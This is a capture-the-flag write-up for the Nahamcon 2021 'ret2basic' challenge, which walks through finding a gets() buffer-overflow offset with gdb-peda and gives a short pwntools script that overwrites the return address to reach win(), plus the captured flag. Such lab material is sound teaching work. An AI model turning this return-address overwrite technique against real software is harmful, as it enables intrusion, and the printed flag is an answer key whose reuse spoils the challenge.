## ret2basic

* **CTF:** Nahamcon CTF 2021
* **Category:** Binary exploitation
* **Points:** 59
* **Author(s):** b0uldrr
* **Date:** 14/03/21

---

### Challenge
```
Can you ret2win?

Download the file below and press the Start button on the top-right to begin this challenge.
```

### Downloads
* [ret2basic](ret2win)

---

### Solution
Standard entry CTF BOF. The `main()` function calls `vuln()` which is vulnerable to a `gets()` buffer overflow. There is an uncalled `win()` function that we need to redirect the program flow to.

![vuln](images/vuln.png)

The program has no canary.

![checksec](images/checksec.png)

I used `objdump` to find the address of the `win()` function (0x401215):

![win_address](images/win_address.png)

I used `gdb-peda` with the `pattern` command to find the overflow required.

* Create the overflow pattern: `pattern create 200 overflow.txt`
* Run the program, inputting the pattern: `r < overflow.txt`
* Program overflows.
* Check the value of the stack pointer: `x/wx $rsp` -> returned value of `0x3941416a`
* Check for the offset of that value in the overflow pattern: `pattern offset 0x3941416a`
* Offset value was found at `120`, so this is the number of bytes we need to overflow before we reach the return instruction pointer on the stack.

I plugged these values into my standard python script and it returned the flag.

```python
#!/usr/bin/python3

import pwn

local = False

if local:
    conn = pwn.process('./ret2basic')
else:
    conn = pwn.remote('challenge.nahamcon.com', 30413)
    
conn.recvuntil('Can you overflow this?: ')

buf  = b'a'*120             # overflow with junk up to an including the base pointer
buf += pwn.p64(0x401215)    # write the address of win() over the return instruction address on the stack

conn.sendline(buf)
print(conn.recvall())
```

![flag](images/flag.png)

---

### Flag 
```
flag{d07f3219a8715e9339f31cfbe09d6502}
```
